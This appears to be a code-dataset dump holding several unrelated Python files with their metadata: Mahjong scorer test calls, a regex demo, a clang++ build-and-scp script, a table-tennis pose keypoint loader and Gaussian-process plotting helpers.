ans=MahjongFanCalculator((),("W1","W1","W1","W2","W2","W2","W3","W3","W3","W4","W4","W4","W5"),"W5",1,True,False,False,True,0,0)
except Exception as err:
print(err)
else:
print(ans)
try:
ans=MahjongFanCalculator((("GANG","W1",2),),("W2","W2","W2","W3","W3","W3","W4","W4","W4","W5"),"W5",1,False,False,False,False,0,0)
except Exception as err:
print(err)
else:
print(ans)
#错误
try:
ans=MahjongFanCalculator((),("W1","W1","W1","W2","W2","W2","W3","W3","W3","W4","W4","W4"),"W5",1,True,False,False,True,0,0)
except Exception as err:
print(err)
else:
print(ans)
#没和
try:
ans=MahjongFanCalculator((("CHI","W1",0),),("W2","W2","W2","W3","W3","W3","W4","W4","W4","W5"),"W7",1,False,False,False,False,0,0)
except Exception as err:
print(err)
else:
print(ans) | 28.387097 | 136 | 0.575 | 137 | 880 | 3.693431 | 0.19708 | 0.063241 | 0.205534 | 0.063241 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0.782609 | 0 | 0.085865 | 0.139773 | 880 | 31 | 137 | 28.387097 | 0.582563 | 0.004545 | 0 | 0.8 | 0 | 0 | 0.128994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.32 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bd7f8b1f86e114488d351db50c4ef110867a0407 | 344 | py | Python | AutomateWithPython/chapter07/RegexDemo02.py | YanhaoXu/python-learning | 856687a71635a2ca67dab49d396c238f128e5ec0 | [
"MIT"
] | 2 | 2021-12-06T13:29:48.000Z | 2022-01-20T11:39:45.000Z | AutomateWithPython/chapter07/RegexDemo02.py | YanhaoXu/python-learning | 856687a71635a2ca67dab49d396c238f128e5ec0 | [
"MIT"
] | null | null | null | AutomateWithPython/chapter07/RegexDemo02.py | YanhaoXu/python-learning | 856687a71635a2ca67dab49d396c238f128e5ec0 | [
"MIT"
] | null | null | null | import re
batRegex = re.compile(r"Bat(wo)*man")
mo1 = batRegex.search("The Adventures of Batman")
print(mo1.group())
batRegex = re.compile(r"Bat(wo)*man")
mo1 = batRegex.search("The Adventures of Batwoman")
print(mo1.group())
batRegex = re.compile(r"Bat(wo)*man")
mo1 = batRegex.search("The Adventures of Batwowowowoman")
print(mo1.group())
| 24.571429 | 57 | 0.723837 | 53 | 344 | 4.698113 | 0.339623 | 0.120482 | 0.204819 | 0.216867 | 0.803213 | 0.803213 | 0.803213 | 0.803213 | 0.803213 | 0.803213 | 0 | 0.019417 | 0.101744 | 344 | 13 | 58 | 26.461538 | 0.786408 | 0 | 0 | 0.6 | 0 | 0 | 0.334302 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.3 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bda927fa79808b39d68457c140941db211ab0fd9 | 232 | py | Python | Serever/compile.py | Erictriangle/MngX | f7fbcc1514f4d24dd2b1dbe237973fefbd7164b0 | [
"BSL-1.0"
] | null | null | null | Serever/compile.py | Erictriangle/MngX | f7fbcc1514f4d24dd2b1dbe237973fefbd7164b0 | [
"BSL-1.0"
] | null | null | null | Serever/compile.py | Erictriangle/MngX | f7fbcc1514f4d24dd2b1dbe237973fefbd7164b0 | [
"BSL-1.0"
] | null | null | null | #!/usr/bin/python3
import os
import sys
os.system("clang++ server.cpp -o Server -I /home/eric/d/Library/boost/include -L /home/eric/d/Library/boost/lib -lpthread")
os.system("scp Server eric@192.168.100.61:/home/eric")
| 23.2 | 124 | 0.693966 | 40 | 232 | 4.025 | 0.65 | 0.149068 | 0.111801 | 0.198758 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 0.12931 | 232 | 9 | 125 | 25.777778 | 0.737624 | 0.073276 | 0 | 0 | 0 | 0.25 | 0.740196 | 0.460784 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
bdd69e7c26e37ec80d5bff1e5fa792846a1a2715 | 16,950 | py | Python | src/data.py | wutonytt/Camera-Based-Table-Tennis-Posture-Analysis | 26cc5be09d4ecf654d5a6fa72cc54d78a5e45798 | [
"MIT"
] | 4 | 2021-09-26T11:41:16.000Z | 2022-01-07T20:41:37.000Z | src/data.py | wutonytt/Camera-Based-Table-Tennis-Posture-Analysis | 26cc5be09d4ecf654d5a6fa72cc54d78a5e45798 | [
"MIT"
] | 1 | 2022-02-03T10:55:28.000Z | 2022-02-03T10:55:28.000Z | src/data.py | wutonytt/Camera-Based-Table-Tennis-Posture-Analysis | 26cc5be09d4ecf654d5a6fa72cc54d78a5e45798 | [
"MIT"
] | 1 | 2022-01-24T23:44:09.000Z | 2022-01-24T23:44:09.000Z | import os, json
import pandas as pd
import numpy as np
def loadTrainData(dirPath, numOfSet):
train = pd.DataFrame()
for d in range(1, numOfSet + 1):
# print(dirPath)
dirpath = os.path.join(dirPath, 'train_' + str(d))
path = os.path.join(dirPath, 'train_' + str(d) + '/' + str(d) + '_')
numOfFiles = len([name for name in os.listdir(dirpath) if os.path.isfile(os.path.join(dirpath, name))]) - 3
# print(numofFiles)
for file_num in range(0, numOfFiles, 3):
file1 = open(path + str(file_num).zfill(12) + '_keypoints.json')
file2 = open(path + str(file_num+1).zfill(12) + '_keypoints.json')
file3 = open(path + str(file_num+2).zfill(12) + '_keypoints.json')
j1 = json.load(file1)
j2 = json.load(file2)
j3 = json.load(file3)
leftData = [[]]
rightData = [[]]
for j in [j1, j2, j3]:
if (j['people'] != [] and j['people'] != [] and j['people'] != []):
for i in j['people']:
counterr = 0
for k in i['pose_keypoints_2d'][::3]:
if (k >= 700):
counterr += 1
if (counterr > 15):
rightData[0] += i['pose_keypoints_2d']
counterl = 0
for k in i['pose_keypoints_2d'][::3]:
if (k <= 200):
counterl += 1
if (counterl > 15):
leftData[0] += i['pose_keypoints_2d']
if (len(leftData[0]) == 225):
leftData = [d] + [file_num] + leftData[0]
dfl = pd.DataFrame ([leftData], columns = ['train_num', 'file_num', 'First_X0', 'First_Y0', 'First_P0','First_X1', 'First_Y1', 'First_P1','First_X2', 'First_Y2', 'First_P2','First_X3', 'First_Y3', 'First_P3','First_X4', 'First_Y4', 'First_P4','First_X5', 'First_Y5', 'First_P5','First_X6', 'First_Y6', 'First_P6','First_X7', 'First_Y7', 'First_P7','First_X8', 'First_Y8', 'First_P8','First_X9', 'First_Y9', 'First_P9','First_X10', 'First_Y10', 'First_P10','First_X11', 'First_Y11', 'First_P11','First_X12', 'First_Y12', 'First_P12','First_X13', 'First_Y13', 'First_P13','First_X14', 'First_Y14', 'First_P14','First_X15', 'First_Y15', 'First_P15','First_X16', 'First_Y16', 'First_P16','First_X17', 'First_Y17', 'First_P17','First_X18', 'First_Y18', 'First_P18','First_X19', 'First_Y19', 'First_P19','First_X20', 'First_Y20', 'First_P10','First_X21', 'First_Y21', 'First_P21','First_X22', 'First_Y22', 'First_P22','First_X23', 'First_Y23', 'First_P23','First_X24', 'First_Y24', 'First_P24', 'Second_X0', 'Second_Y0', 'Second_P0','Second_X1', 'Second_Y1', 'Second_P1','Second_X2', 'Second_Y2', 'Second_P2','Second_X3', 'Second_Y3', 'Second_P3','Second_X4', 'Second_Y4', 'Second_P4','Second_X5', 'Second_Y5', 'Second_P5','Second_X6', 'Second_Y6', 'Second_P6','Second_X7', 'Second_Y7', 'Second_P7','Second_X8', 'Second_Y8', 'Second_P8','Second_X9', 'Second_Y9', 'Second_P9','Second_X10', 'Second_Y10', 'Second_P10','Second_X11', 'Second_Y11', 'Second_P11','Second_X12', 'Second_Y12', 'Second_P12','Second_X13', 'Second_Y13', 'Second_P13','Second_X14', 'Second_Y14', 'Second_P14','Second_X15', 'Second_Y15', 'Second_P15','Second_X16', 'Second_Y16', 'Second_P16','Second_X17', 'Second_Y17', 'Second_P17','Second_X18', 'Second_Y18', 'Second_P18','Second_X19', 'Second_Y19', 'Second_P19','Second_X20', 'Second_Y20', 'Second_P10','Second_X21', 'Second_Y21', 'Second_P21','Second_X22', 'Second_Y22', 'Second_P22','Second_X23', 'Second_Y23', 'Second_P23','Second_X24', 'Second_Y24', 'Second_P24', 'Third_X0', 'Third_Y0', 'Third_P0','Third_X1', 'Third_Y1', 'Third_P1','Third_X2', 'Third_Y2', 'Third_P2','Third_X3', 'Third_Y3', 'Third_P3','Third_X4', 'Third_Y4', 'Third_P4','Third_X5', 'Third_Y5', 'Third_P5','Third_X6', 'Third_Y6', 'Third_P6','Third_X7', 'Third_Y7', 'Third_P7','Third_X8', 'Third_Y8', 'Third_P8','Third_X9', 'Third_Y9', 'Third_P9','Third_X10', 'Third_Y10', 'Third_P10','Third_X11', 'Third_Y11', 'Third_P11','Third_X12', 'Third_Y12', 'Third_P12','Third_X13', 'Third_Y13', 'Third_P13','Third_X14', 'Third_Y14', 'Third_P14','Third_X15', 'Third_Y15', 'Third_P15','Third_X16', 'Third_Y16', 'Third_P16','Third_X17', 'Third_Y17', 'Third_P17','Third_X18', 'Third_Y18', 'Third_P18','Third_X19', 'Third_Y19', 'Third_P19','Third_X20', 'Third_Y20', 'Third_P10','Third_X21', 'Third_Y21', 'Third_P21','Third_X22', 'Third_Y22', 'Third_P22','Third_X23', 'Third_Y23', 'Third_P23','Third_X24', 'Third_Y24', 'Third_P24'])
dfl['left/right'] = 0
train = train.append(dfl, ignore_index=True)
if (len(rightData[0]) == 225):
rightData = [d] + [file_num] + rightData[0]
dfr = pd.DataFrame ([rightData], columns = ['train_num', 'file_num', 'First_X0', 'First_Y0', 'First_P0','First_X1', 'First_Y1', 'First_P1','First_X2', 'First_Y2', 'First_P2','First_X3', 'First_Y3', 'First_P3','First_X4', 'First_Y4', 'First_P4','First_X5', 'First_Y5', 'First_P5','First_X6', 'First_Y6', 'First_P6','First_X7', 'First_Y7', 'First_P7','First_X8', 'First_Y8', 'First_P8','First_X9', 'First_Y9', 'First_P9','First_X10', 'First_Y10', 'First_P10','First_X11', 'First_Y11', 'First_P11','First_X12', 'First_Y12', 'First_P12','First_X13', 'First_Y13', 'First_P13','First_X14', 'First_Y14', 'First_P14','First_X15', 'First_Y15', 'First_P15','First_X16', 'First_Y16', 'First_P16','First_X17', 'First_Y17', 'First_P17','First_X18', 'First_Y18', 'First_P18','First_X19', 'First_Y19', 'First_P19','First_X20', 'First_Y20', 'First_P10','First_X21', 'First_Y21', 'First_P21','First_X22', 'First_Y22', 'First_P22','First_X23', 'First_Y23', 'First_P23','First_X24', 'First_Y24', 'First_P24', 'Second_X0', 'Second_Y0', 'Second_P0','Second_X1', 'Second_Y1', 'Second_P1','Second_X2', 'Second_Y2', 'Second_P2','Second_X3', 'Second_Y3', 'Second_P3','Second_X4', 'Second_Y4', 'Second_P4','Second_X5', 'Second_Y5', 'Second_P5','Second_X6', 'Second_Y6', 'Second_P6','Second_X7', 'Second_Y7', 'Second_P7','Second_X8', 'Second_Y8', 'Second_P8','Second_X9', 'Second_Y9', 'Second_P9','Second_X10', 'Second_Y10', 'Second_P10','Second_X11', 'Second_Y11', 'Second_P11','Second_X12', 'Second_Y12', 'Second_P12','Second_X13', 'Second_Y13', 'Second_P13','Second_X14', 'Second_Y14', 'Second_P14','Second_X15', 'Second_Y15', 'Second_P15','Second_X16', 'Second_Y16', 'Second_P16','Second_X17', 'Second_Y17', 'Second_P17','Second_X18', 'Second_Y18', 'Second_P18','Second_X19', 'Second_Y19', 'Second_P19','Second_X20', 'Second_Y20', 'Second_P10','Second_X21', 'Second_Y21', 'Second_P21','Second_X22', 'Second_Y22', 'Second_P22','Second_X23', 'Second_Y23', 'Second_P23','Second_X24', 'Second_Y24', 'Second_P24', 'Third_X0', 'Third_Y0', 'Third_P0','Third_X1', 'Third_Y1', 'Third_P1','Third_X2', 'Third_Y2', 'Third_P2','Third_X3', 'Third_Y3', 'Third_P3','Third_X4', 'Third_Y4', 'Third_P4','Third_X5', 'Third_Y5', 'Third_P5','Third_X6', 'Third_Y6', 'Third_P6','Third_X7', 'Third_Y7', 'Third_P7','Third_X8', 'Third_Y8', 'Third_P8','Third_X9', 'Third_Y9', 'Third_P9','Third_X10', 'Third_Y10', 'Third_P10','Third_X11', 'Third_Y11', 'Third_P11','Third_X12', 'Third_Y12', 'Third_P12','Third_X13', 'Third_Y13', 'Third_P13','Third_X14', 'Third_Y14', 'Third_P14','Third_X15', 'Third_Y15', 'Third_P15','Third_X16', 'Third_Y16', 'Third_P16','Third_X17', 'Third_Y17', 'Third_P17','Third_X18', 'Third_Y18', 'Third_P18','Third_X19', 'Third_Y19', 'Third_P19','Third_X20', 'Third_Y20', 'Third_P10','Third_X21', 'Third_Y21', 'Third_P21','Third_X22', 'Third_Y22', 'Third_P22','Third_X23', 'Third_Y23', 'Third_P23','Third_X24', 'Third_Y24', 'Third_P24'])
dfr['left/right'] = 1
train = train.append(dfr, ignore_index=True)
train = train.drop(list(train.filter(like='P', axis=1)), axis = 1)
return train
def loadTestData(dirPath, frontName):
test = pd.DataFrame()
path = os.path.join(dirPath, frontName)
numOfFiles = len([name for name in os.listdir(dirPath) if os.path.isfile(os.path.join(dirPath, name))]) - 3
for file_num in range(0, numOfFiles, 3):
file1 = open(path + str(file_num).zfill(12) + '_keypoints.json')
file2 = open(path + str(file_num+1).zfill(12) + '_keypoints.json')
file3 = open(path + str(file_num+2).zfill(12) + '_keypoints.json')
j1 = json.load(file1)
j2 = json.load(file2)
j3 = json.load(file3)
leftData = [[]]
rightData = [[]]
for j in [j1, j2, j3]:
if (j['people'] != [] and j['people'] != [] and j['people'] != []):
for i in j['people']:
counterr = 0
for k in i['pose_keypoints_2d'][::3]:
if (k >= 700):
counterr += 1
if (counterr > 15):
rightData[0] += i['pose_keypoints_2d']
counterl = 0
for k in i['pose_keypoints_2d'][::3]:
if (k <= 200):
counterl += 1
if (counterl > 15):
leftData[0] += i['pose_keypoints_2d']
if (len(leftData[0]) == 225):
leftData = [file_num] + leftData[0]
dfl = pd.DataFrame ([leftData], columns = ['file_num', 'First_X0', 'First_Y0', 'First_P0','First_X1', 'First_Y1', 'First_P1','First_X2', 'First_Y2', 'First_P2','First_X3', 'First_Y3', 'First_P3','First_X4', 'First_Y4', 'First_P4','First_X5', 'First_Y5', 'First_P5','First_X6', 'First_Y6', 'First_P6','First_X7', 'First_Y7', 'First_P7','First_X8', 'First_Y8', 'First_P8','First_X9', 'First_Y9', 'First_P9','First_X10', 'First_Y10', 'First_P10','First_X11', 'First_Y11', 'First_P11','First_X12', 'First_Y12', 'First_P12','First_X13', 'First_Y13', 'First_P13','First_X14', 'First_Y14', 'First_P14','First_X15', 'First_Y15', 'First_P15','First_X16', 'First_Y16', 'First_P16','First_X17', 'First_Y17', 'First_P17','First_X18', 'First_Y18', 'First_P18','First_X19', 'First_Y19', 'First_P19','First_X20', 'First_Y20', 'First_P10','First_X21', 'First_Y21', 'First_P21','First_X22', 'First_Y22', 'First_P22','First_X23', 'First_Y23', 'First_P23','First_X24', 'First_Y24', 'First_P24', 'Second_X0', 'Second_Y0', 'Second_P0','Second_X1', 'Second_Y1', 'Second_P1','Second_X2', 'Second_Y2', 'Second_P2','Second_X3', 'Second_Y3', 'Second_P3','Second_X4', 'Second_Y4', 'Second_P4','Second_X5', 'Second_Y5', 'Second_P5','Second_X6', 'Second_Y6', 'Second_P6','Second_X7', 'Second_Y7', 'Second_P7','Second_X8', 'Second_Y8', 'Second_P8','Second_X9', 'Second_Y9', 'Second_P9','Second_X10', 'Second_Y10', 'Second_P10','Second_X11', 'Second_Y11', 'Second_P11','Second_X12', 'Second_Y12', 'Second_P12','Second_X13', 'Second_Y13', 'Second_P13','Second_X14', 'Second_Y14', 'Second_P14','Second_X15', 'Second_Y15', 'Second_P15','Second_X16', 'Second_Y16', 'Second_P16','Second_X17', 'Second_Y17', 'Second_P17','Second_X18', 'Second_Y18', 'Second_P18','Second_X19', 'Second_Y19', 'Second_P19','Second_X20', 'Second_Y20', 'Second_P10','Second_X21', 'Second_Y21', 'Second_P21','Second_X22', 'Second_Y22', 'Second_P22','Second_X23', 'Second_Y23', 'Second_P23','Second_X24', 'Second_Y24', 'Second_P24', 'Third_X0', 'Third_Y0', 'Third_P0','Third_X1', 'Third_Y1', 'Third_P1','Third_X2', 'Third_Y2', 'Third_P2','Third_X3', 'Third_Y3', 'Third_P3','Third_X4', 'Third_Y4', 'Third_P4','Third_X5', 'Third_Y5', 'Third_P5','Third_X6', 'Third_Y6', 'Third_P6','Third_X7', 'Third_Y7', 'Third_P7','Third_X8', 'Third_Y8', 'Third_P8','Third_X9', 'Third_Y9', 'Third_P9','Third_X10', 'Third_Y10', 'Third_P10','Third_X11', 'Third_Y11', 'Third_P11','Third_X12', 'Third_Y12', 'Third_P12','Third_X13', 'Third_Y13', 'Third_P13','Third_X14', 'Third_Y14', 'Third_P14','Third_X15', 'Third_Y15', 'Third_P15','Third_X16', 'Third_Y16', 'Third_P16','Third_X17', 'Third_Y17', 'Third_P17','Third_X18', 'Third_Y18', 'Third_P18','Third_X19', 'Third_Y19', 'Third_P19','Third_X20', 'Third_Y20', 'Third_P10','Third_X21', 'Third_Y21', 'Third_P21','Third_X22', 'Third_Y22', 'Third_P22','Third_X23', 'Third_Y23', 'Third_P23','Third_X24', 'Third_Y24', 'Third_P24'])
dfl['left/right'] = 0
test = test.append(dfl, ignore_index=True)
if (len(rightData[0]) == 225):
rightData = [file_num] + rightData[0]
dfr = pd.DataFrame ([rightData], columns = ['file_num', 'First_X0', 'First_Y0', 'First_P0','First_X1', 'First_Y1', 'First_P1','First_X2', 'First_Y2', 'First_P2','First_X3', 'First_Y3', 'First_P3','First_X4', 'First_Y4', 'First_P4','First_X5', 'First_Y5', 'First_P5','First_X6', 'First_Y6', 'First_P6','First_X7', 'First_Y7', 'First_P7','First_X8', 'First_Y8', 'First_P8','First_X9', 'First_Y9', 'First_P9','First_X10', 'First_Y10', 'First_P10','First_X11', 'First_Y11', 'First_P11','First_X12', 'First_Y12', 'First_P12','First_X13', 'First_Y13', 'First_P13','First_X14', 'First_Y14', 'First_P14','First_X15', 'First_Y15', 'First_P15','First_X16', 'First_Y16', 'First_P16','First_X17', 'First_Y17', 'First_P17','First_X18', 'First_Y18', 'First_P18','First_X19', 'First_Y19', 'First_P19','First_X20', 'First_Y20', 'First_P10','First_X21', 'First_Y21', 'First_P21','First_X22', 'First_Y22', 'First_P22','First_X23', 'First_Y23', 'First_P23','First_X24', 'First_Y24', 'First_P24', 'Second_X0', 'Second_Y0', 'Second_P0','Second_X1', 'Second_Y1', 'Second_P1','Second_X2', 'Second_Y2', 'Second_P2','Second_X3', 'Second_Y3', 'Second_P3','Second_X4', 'Second_Y4', 'Second_P4','Second_X5', 'Second_Y5', 'Second_P5','Second_X6', 'Second_Y6', 'Second_P6','Second_X7', 'Second_Y7', 'Second_P7','Second_X8', 'Second_Y8', 'Second_P8','Second_X9', 'Second_Y9', 'Second_P9','Second_X10', 'Second_Y10', 'Second_P10','Second_X11', 'Second_Y11', 'Second_P11','Second_X12', 'Second_Y12', 'Second_P12','Second_X13', 'Second_Y13', 'Second_P13','Second_X14', 'Second_Y14', 'Second_P14','Second_X15', 'Second_Y15', 'Second_P15','Second_X16', 'Second_Y16', 'Second_P16','Second_X17', 'Second_Y17', 'Second_P17','Second_X18', 'Second_Y18', 'Second_P18','Second_X19', 'Second_Y19', 'Second_P19','Second_X20', 'Second_Y20', 'Second_P10','Second_X21', 'Second_Y21', 'Second_P21','Second_X22', 'Second_Y22', 'Second_P22','Second_X23', 'Second_Y23', 'Second_P23','Second_X24', 'Second_Y24', 'Second_P24', 'Third_X0', 'Third_Y0', 'Third_P0','Third_X1', 'Third_Y1', 'Third_P1','Third_X2', 'Third_Y2', 'Third_P2','Third_X3', 'Third_Y3', 'Third_P3','Third_X4', 'Third_Y4', 'Third_P4','Third_X5', 'Third_Y5', 'Third_P5','Third_X6', 'Third_Y6', 'Third_P6','Third_X7', 'Third_Y7', 'Third_P7','Third_X8', 'Third_Y8', 'Third_P8','Third_X9', 'Third_Y9', 'Third_P9','Third_X10', 'Third_Y10', 'Third_P10','Third_X11', 'Third_Y11', 'Third_P11','Third_X12', 'Third_Y12', 'Third_P12','Third_X13', 'Third_Y13', 'Third_P13','Third_X14', 'Third_Y14', 'Third_P14','Third_X15', 'Third_Y15', 'Third_P15','Third_X16', 'Third_Y16', 'Third_P16','Third_X17', 'Third_Y17', 'Third_P17','Third_X18', 'Third_Y18', 'Third_P18','Third_X19', 'Third_Y19', 'Third_P19','Third_X20', 'Third_Y20', 'Third_P10','Third_X21', 'Third_Y21', 'Third_P21','Third_X22', 'Third_Y22', 'Third_P22','Third_X23', 'Third_Y23', 'Third_P23','Third_X24', 'Third_Y24', 'Third_P24'])
dfr['left/right'] = 1
test = test.append(dfr, ignore_index=True)
test = test.drop(list(test.filter(like='P', axis=1)), axis = 1)
return test
def addTrainLabel(train, labelFile):
labeldf = pd.read_csv(os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + '/' + labelFile)
for index, row in labeldf.iterrows():
row['file_num'] = 3 * round(row['file_num']/3)
train = pd.merge(train, labeldf, on=['train_num', 'file_num','left/right'], how = 'inner')
return train
def addTestLabel(test, labelFile, test_num):
labeldf = pd.read_csv(os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + '/' + labelFile)
for index, row in labeldf.iterrows():
row['file_num'] = 3 * round(row['file_num']/3)
labeldf = labeldf[labeldf['train_num'] == test_num]
test = pd.merge(test, labeldf, on=['file_num','left/right'], how = 'inner')
return test
def dataAugmentation(train):
tmp0 = train.copy()
fore = tmp0[tmp0['fore/back'] == 1]
back = tmp0[tmp0['fore/back'] == 0]
# fore
for i in range(-5,6):
tmp = fore.copy()
if i == 0 :
continue
cols = train.iloc[:,2:-1].columns
tmp[cols] += i
train = train.append(tmp, ignore_index=True)
# back
for i in range(-7,8):
tmp = back.copy()
if i == 0 :
continue
cols = train.iloc[:,2:-1].columns
tmp[cols] += i
train = train.append(tmp, ignore_index=True)
return train | 113 | 2,923 | 0.639056 | 2,475 | 16,950 | 3.985051 | 0.074343 | 0.015614 | 0.011356 | 0.012978 | 0.939167 | 0.931765 | 0.931765 | 0.92041 | 0.914935 | 0.899118 | 0 | 0.109883 | 0.15115 | 16,950 | 150 | 2,924 | 113 | 0.575619 | 0.002478 | 0 | 0.65812 | 0 | 0 | 0.504969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042735 | false | 0 | 0.025641 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
da0c4b2d96c9567e863314be9709a0e1545bd773 | 24,735 | py | Python | steingp/plotters.py | thomaspinder/SteinGP | 2d9a44c2a5bcb59e0cb26e9c3acd307a16c47bdc | [
"Apache-2.0"
] | 6 | 2021-01-08T10:55:23.000Z | 2021-11-26T08:36:28.000Z | steingp/plotters.py | thomaspinder/SteinGP | 2d9a44c2a5bcb59e0cb26e9c3acd307a16c47bdc | [
"Apache-2.0"
] | 1 | 2021-08-25T16:09:37.000Z | 2021-08-25T16:09:37.000Z | steingp/plotters.py | thomaspinder/SteinGP | 2d9a44c2a5bcb59e0cb26e9c3acd307a16c47bdc | [
"Apache-2.0"
] | 1 | 2021-01-12T19:37:28.000Z | 2021-01-12T19:37:28.000Z | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
from numpy import ndarray
from gpflow.models import GPModel
def plot_boundary(m: GPModel, X: ndarray, y: ndarray, ax=None):
x_grid = np.linspace(min(X[:, 0]), max(X[:, 0]), 40)
y_grid = np.linspace(min(X[:, 1]), max(X[:, 1]), 40)
xx, yy = np.meshgrid(x_grid, y_grid)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
mask = y[:, 0] == 1
p, _ = m.predict_y(Xplot) # here we only care about the mean
if ax is None:
fig, ax = plt.subplots(figsize=(10, 5))
# plt.figure(figsize=(7, 7))
ax.plot(X[mask, 0], X[mask, 1], "oC0", mew=0, alpha=0.5, label="1")
ax.plot(X[np.logical_not(mask), 0],
X[np.logical_not(mask), 1],
"oC1",
mew=0,
alpha=0.5,
label="0")
_ = ax.contour(
xx,
yy,
p.numpy().reshape(*xx.shape),
[0.5], # plot the p=0.5 contour line only
colors="k",
linewidths=1.8,
zorder=100,
)
ax.legend(loc='best')
ax.axis("off")
def make_predictive_plot(ax,
dataset,
mu: ndarray,
sigma: ndarray,
lik='gaussian',
plt_type="testing"):
X, Y, Xte, Yte = dataset
test_type = [ax.scatter if lik == 'bernoulli' else ax.plot][0]
test_label = ["Testing points" if plt_type == "testing" else plt_type][0]
test_type(Xte, Yte.flatten(), label=test_label, color="green", alpha=0.5)
ax.plot(Xte, mu, label="Predictive mean", color="blue")
ax.fill_between(Xte[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
ax.plot(X, Y, 'o', color="black", markersize=5, label="Training points")
handles, labels = ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
ax.legend(handles, labels, loc='upper left')
ax.set_xlabel("X")
ax.set_ylabel("Y")
return ax
def progress_plot(ax, progress, model_name: str):
ax.plot(progress, label=model_name, linewidth=2)
ax.set_xlabel("Optimisation iteration")
ax.set_ylabel("Marginal log-likelihood")
ax.legend(loc="lower right")
def make_gpr_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
# adam_mll = pd.read_csv("quick_svgd/adam_1particle_comparison.csv")
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="SteinGP", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="Latent function",
color="green",
alpha=0.5)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.plot(X,
Y,
'o',
color="black",
markersize=5,
label="Training points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for p, lab, col, pa in zip(particles,
['Lengthscale', 'Variance', 'Obs. noise'],
cols[:particles.shape[0]],
model.trainable_parameters):
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1],
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(
0.5,
0.96,
"Recovering a realisation from a GP with lengthscale=0.2, variance=0.3 and obs. noise=0.2",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("plots/regression.png")
plt.close(fig)
def plot_K(K, dK, iteration, filename):
with plt.style.context("seaborn-notebook"):
fig, ax = plt.subplots(nrows=1, ncols=2, figsize=(16, 6))
im1 = ax[0].imshow(K)
# ax[0].spines['top'].set_visible(False)
# ax[0].spines['bottom'].set_visible(False)
# ax[0].spines['right'].set_visible(False)
# ax[0].spines['left'].set_visible(False)
# ax[0].tick_params(left=False, right=False, top=False, bottom=False)
# # Turn off tick labels
